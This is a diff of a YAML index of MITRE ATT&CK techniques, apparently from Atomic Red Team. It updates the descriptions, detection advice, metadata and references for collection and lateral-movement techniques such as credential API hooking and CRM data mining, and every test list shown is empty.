-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -41585,9 +42132,60 @@ collection:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1213.004:
+    technique:
+      modified: '2024-10-17T14:36:24.983Z'
+      name: Customer Relationship Management Software
+      description: |-
+        Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+        Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+        CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Centre for Cybersecurity Belgium (CCB)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Logon Session: Logon Session Creation'
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+      created: '2024-07-01T20:06:13.664Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/004
+        external_id: T1213.004
+      - source_name: Bleeping Computer Bank Hack 2020
+        description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+          100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+      - source_name: Bleeping Computer Mint Mobile Hack 2021
+        description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+          after numbers ported, data accessed. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+      - source_name: Bleeping Computer US Cellular Hack 2022
+        description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+          after billing system hack. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -41633,7 +42231,7 @@ collection:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -41652,37 +42250,36 @@ collection:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.003:
     technique:
-      modified: '2022-10-18T22:44:01.723Z'
+      modified: '2024-09-04T13:03:54.101Z'
       name: Code Repositories
       description: |-
         Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
 
-        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
 
         **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Toby Kohlenberg
+      - Josh Liburdi, @jshlbrd
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor access to code repositories, especially performed
         by privileged users such as Active Directory Domain or Enterprise Administrators
         as these types of accounts should generally not be used to access code repositories.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user-based anomalies.
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Toby Kohlenberg
-      - Josh Liburdi, @jshlbrd
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41705,41 +42302,52 @@ collection:
         url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213:
     technique:
-      modified: '2024-03-01T16:27:47.391Z'
+      modified: '2024-10-28T19:10:16.960Z'
       name: Data from Information Repositories
       description: "Adversaries may leverage information repositories to mine valuable
         information. Information repositories are tools that allow for storage of
         information, typically to facilitate collaboration or information sharing
         between users, and can store a wide variety of data that may aid adversaries
-        in further objectives, or direct access to the target information. Adversaries
-        may also abuse external sharing features to share sensitive documents with
-        recipients outside of the organization. \n\nThe following is a brief list
-        of example information that may hold potential value to an adversary and may
-        also be found on an information repository:\n\n* Policies, procedures, and
-        standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
-        Technical system documentation\n* Testing / development credentials\n* Work
-        / project schedules\n* Source code snippets\n* Links to network shares and
-        other internal resources\n\nInformation stored in a repository may vary based
-        on the specific instance or environment. Specific common information repositories
-        include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
-        and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
-        services such as Code Repositories, IaaS databases, enterprise databases,
-        and other storage infrastructure such as SQL Server."
+        in further objectives, such as Credential Access, Lateral Movement, or Defense
+        Evasion, or direct access to the target information. Adversaries may also
+        abuse external sharing features to share sensitive documents with recipients
+        outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+        \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on an information repository:\n\n*
+        Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+        System architecture diagrams\n* Technical system documentation\n* Testing
+        / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+        \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+        and other internal resources\n* Contact or other sensitive information about
+        business partners and customers, including personally identifiable information
+        (PII) \n\nInformation stored in a repository may vary based on the specific
+        instance or environment. Specific common information repositories include
+        the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+        and more specialized platforms such as customer relationship management (CRM)
+        databases \n* Collaboration platforms such as SharePoint, Confluence, and
+        code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+        \n\nIn some cases, information repositories have been improperly secured,
+        typically by unintentionally allowing for overly-broad access by all users
+        or even public access to unauthenticated users. This is particularly common
+        with cloud-native or cloud-hosted services, such as AWS Relational Database
+        Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+        Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Regina Elwell
       - Praetorian
       - Milos Stojadinovic
       - Isif Ibrahima, Mandiant
+      - Obsidian Security
+      - Naveen Vijayaraghavan
+      - Nilesh Dherange (Gurucul)
       x_mitre_deprecated: false
       x_mitre_detection: "As information repositories generally have a considerably
         large user base, detection of malicious use can be non-trivial. At minimum,
@@ -41768,10 +42376,9 @@ collection:
       - Windows
       - macOS
       - SaaS
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '3.3'
+      - Office Suite
+      x_mitre_version: '3.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -41784,10 +42391,20 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1213
         external_id: T1213
+      - source_name: Mitiga
+        description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+          I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+          Retrieved September 24, 2024.
+        url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
       - source_name: Atlassian Confluence Logging
         description: Atlassian. (2018, January 9). How to Enable User Access Logging.
           Retrieved April 4, 2018.
         url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      - source_name: TrendMicro Exposed Redis 2020
+        description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+          Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+          September 25, 2024.
+        url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
       - source_name: Microsoft SharePoint Logging
         description: Microsoft. (2017, July 19). Configure audit settings for a site
           collection. Retrieved April 4, 2018.
@@ -41796,11 +42413,14 @@ collection:
         description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
           8, 2021.
         url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+      - source_name: Cybernews Reuters Leak 2022
+        description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+          and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+        url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1602.001:
     technique:
@@ -41837,7 +42457,7 @@ collection:
         description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
           of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
           19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T01:54:22.812Z'
       name: SNMP (MIB Dump)
       description: "Adversaries may target the Management Information Base (MIB) to
         collect and/or mine valuable information in a network managed using Simple
@@ -41869,115 +42489,182 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-08-27T21:03:56.385Z'
+      name: 'Input Capture: Credential API Hooking'
+      description: |
+        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Metadata'
+      - 'Process: OS API Execution'
       type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
       created: '2020-02-11T19:01:15.930Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1056.004
         url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
       - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
         description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
           Retrieved December 18, 2017.
         url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Hook Overview
         description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
           December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
         description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
         description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
           12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
         description: Stack Exchange - Security. (2012, July 31). What are the methods
           to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
-      name: 'Input Capture: Credential API Hooking'
-      description: |
-        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
-        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
-        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
-        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1056.004
+    atomic_tests: []
+  T1213.005:
+    technique:
+      modified: '2024-10-16T14:22:49.146Z'
+      name: Messaging Applications
+      description: "Adversaries may leverage chat and messaging applications, such
+        as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+        \ \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on messaging applications: \n\n*
+        Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+        \n* Source code snippets \n* Links to network shares and other internal resources
+        \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+        about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+        2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+        messaging applications, adversaries may leverage data from chat messages in
+        order to improve their targeting - for example, by learning more about an
+        environment or evading ongoing incident response efforts.(Citation: Sentinel
+        Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: |-
-        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
-        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
-        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - Obsidian Security
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      - Office Suite
       x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
-      - 'Process: Process Metadata'
-      - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-      identifier: T1056.004
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+      created: '2024-08-30T13:50:42.023Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/005
+        external_id: T1213.005
+      - source_name: Sentinel Labs NullBulge 2024
+        description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+          as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+        url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+      - source_name: SC Magazine Ragnar Locker 2021
+        description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+          victims it can read the on-network incident response chat rooms. Retrieved
+          August 30, 2024.
+        url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+      - source_name: Guardian Grand Theft Auto Leak 2022
+        description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+          19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+          Retrieved August 30, 2024.'
+        url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+      - source_name: Microsoft DEV-0537
+        description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+          organizations for data exfiltration and destruction. Retrieved March 23,
+          2022.
+        url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
 lateral-movement:
   T1021.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:20:07.264Z'
       name: Remote Services:VNC
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
@@ -41988,6 +42675,7 @@ lateral-movement:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: lateral-movement
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
 
@@ -41997,7 +42685,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -42013,66 +42700,67 @@ lateral-movement:
       id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
       created: '2020-02-11T18:28:44.950Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1021/005
         external_id: T1021.005
-      - source_name: The Remote Framebuffer Protocol
